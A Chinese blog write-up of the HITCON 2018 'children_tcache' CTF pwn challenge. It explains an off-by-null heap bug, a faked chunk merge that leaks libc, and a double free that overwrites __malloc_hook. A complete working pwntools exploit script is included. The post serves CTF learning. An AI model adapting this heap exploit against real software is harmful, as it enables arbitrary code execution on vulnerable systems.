hitcon_2018_children_tcache(tcache off-by-null,另一种doublefree)

最新推荐文章于 2022-11-18 16:17:48 发布
最新推荐文章于 2022-11-18 16:17:48 发布
阅读量393 收藏 1
点赞数 2
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121169047
版权

hitcon_2018_children_tcache:

显然保护全开
请添加图片描述

请添加图片描述

逆向分析:

add函数:
漏洞在这个strcpy函数上
请添加图片描述

delete函数:
da是垃圾数据,阻碍我们漏洞利用,我们后面要利用strcpy的\x00循环一个一个清理prevsize所在的地方为\x00
请添加图片描述

show函数:

在这里插入图片描述

大致思路:

由于有off-by-null 我们可以改size的prev in use位为0,我们可以利用unssortbin合并堆块,
造成堆块复用
泄露libc地址,用doublefree,改malloc_hook为onegadget

具体步骤:

1.先申请4个堆块

chunk0 unsorted bin,这题有tcache,大于0x410可以绕过
chunk1 	
chunk2 unsorted bin,这题有tcache,大于0x410可以绕过
chunk3 防止合并

2.释放chunk0,为合并做准备

3.我们释放chunk1,再申请chunk1回来,填满数据,修改chunk2的prev in use位为0
由于free时会在prev size处填da,我们也需要控制prev size
所以循环一个一个字节一次清零,清零后我们填入prev size为chunk0+chunk1大小的和

到这里,我们已经布置好合并所需的条件了,然后用delete chunk2触发
(虽然合并了,但是chunk1里的指针还在,合并操作并没有清零指针)

4.我们申请和chunk0一样大小的chunk,就会从合并的unsortbin中割一块,然后有main_arena+96地址就对应下移到了chunk1的fd与bk处,由于指针还在,我们就能show出来,相应计算出libc_base,__malloc_hook,onegadget

5.我们再申请chunk1大小的size,在bss指针里就有了两个指向chunk1的指针了
我们就可以doublefree,然后我们利用doublefree改hook为og

小结:

利用offbynull,伪造了合并,释放,但bss段的指针并没有清零掉,造成了另一种uaf,doublefree
(仅为个人观点)

exp:

from pwn import *
from LibcSearcher import *
local_file  = './HITCON_2018_children_tcache'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29418 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]

def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------------
def add(size,content):
    sla('Your choice: ','1')
    sla('Size',str(size))
    sa('Data:',content)
def show(index):
    sla('Your choice: ','2')
    sla('Index:',str(index))
def delete(index):
    sla('Your choice: ','3')
    sla('Index:',str(index))
#----------------------------------
add(0x500,'a')#
add(0x68,'a')#
add(0x5f0,'a')#
add(0x20,'a')#3
delete(1)
delete(0)
for i in range(9):
    add(0x68 - i, 'b' * (0x68 - i))#
    delete(0)
add(0x68, 'b'*0x60+p64(0x580))#0
delete(2)
#debug()
add(0x508, 'a'*0x507)#1
#debug()
show(0)
libc_base=uu64(rc(6))-96-0x10-libc.sym['__malloc_hook']
print hex(libc_base)
og=[0x4f2c5,0x4f322,0x10a38c]
onegadget=libc_base+og[1]
#----------------------------------
add(0x68,'b'*0x67)#
delete(0)
delete(2)
add(0x60,p64(libc_base+libc.sym['__malloc_hook']))#
add(0x60,'a')
add(0x60,p64(onegadget))
sla('Your choice: ','1')
sla('Size','99')
#debug()
r.interactive()

参考师傅:
https://blog.csdn.net/weixin_44145820/article/details/105433911

https://blog.csdn.net/yongbaoii/article/details/114608875

Nq0inaen
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-5(Tcache
weixin_44145820的博客
04-13 1294
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week 安全 安全威胁 漏洞挖掘 信息安全研究 威胁检测
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的字符串输入都不以NULL字节结尾,例如human->name , teacher->subject , engineer->language , athlete->sport doctor->hospital , athlete->sport bug2:悬空指针 当我们编辑工程师并输入空语言时,它将free(engineer->language) 。 但是,它没有清理并留下了悬空的指针,这导致了双重释放和UAF(可重新编辑) 开发 以下漏洞利用假设是在LFH禁用的情况下进行的。 有挑战性的部分是bug2。 engineer->lang
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru 安全建设 水坑攻击 威胁情报 安全体系 web安全
2018 HITCON On my Raddit
Risker
10-22 766
orange 大大出的这个题与其放在 Web 里,不如放在 Crypto 里。这里说一下比赛时的思路。 打开题目: flag 是加密密钥,而 hint 提示加密密钥是小写字母。还有一个P的提示。 查看一波源码: 可以看到都是?s=密文的形式。网页提供了一个页面显示多少文章的选项,我们关注一下这块的源码: 可以看到两个密文前 64bit是一样的,后 64bit 不同,可以推断 64 bit 应...
HITCON_2018_children_tcache
SkYe's Blog
10-24 895
tcache 结合 off by null 基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled 基本堆管理器,有增删查功能。用 chunk_ptr_list 和 chunk_size_list 两个链表维护,数量上限为 12 ,使用的不是只递增的下标,而是哪个下标没有使用就用哪个,即只.
[off by null + tcache dup]lctf_easy_heap
huzai9527的博客
05-17 234
[off by null + tcache dup]lctf_easy_heap 1.ida 分析 malloc函数中输入content存在off by null 2.思路 通过off by null,造成chunk overlapping,泄漏Libc的地址 这里存在off by null 通过unstored bin就可以泄漏,但由于tcache的存在,需要注意 先申请10个chunk,释放3-9,填满tcache bin之后,再释放0,1,2编号的chunk进入unstored bin
HITCON 2018 PWN baby_tcache
u014377094的博客
03-20 265
此题需要利用_IO_2_1_stdout泄露libc(2条消息) 好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc_hollk的博客-CSDN博客_stdout泄露libc libc替换(2条消息) glibc更换(patchelf方法)_TTYflag的博客-CSDN博客_glibc patch 保护开的很全 里面没什么好看的,还是常见的创建块,删除快两个操作。 创建堆块的时候存在off-by-one漏洞 思路,利用extend,分别通过unsortedbi.
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON_2018_children_tcache关于off by null
wuyvle的博客
04-05 1117
创建Chunk时,使用了strcpy函数,而这个函数会在将字符串转移后在末尾添加一个x00,因此此处存在一个off-by-null漏洞。 思路 off by null 想到堆重叠(overlapping),和 16 区别主要是申请的 unsorted bin 大小需要大于 0x408 来避免 chunk 放入 tcache 。 溢出修改 inuse 位比较简单,申请使用下一个 chunk prev_size 的堆直接写满就行,就是 prev_size 怎么写需要想一下办法。因为 free chunk 之前.
x_nuca_2018_offbyone2(off by null,unlink造成doublefree
m0_51251108的博客
11-19 3181
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2732
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1695
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1626
做arm架构下的pwn题某个报错
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1124
CISCN2021pwn pwny(数组越界,劫持exit_hook)
house of cat 学习
m0_51251108的博客
10-13 1121
house of cat的利用链学习
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值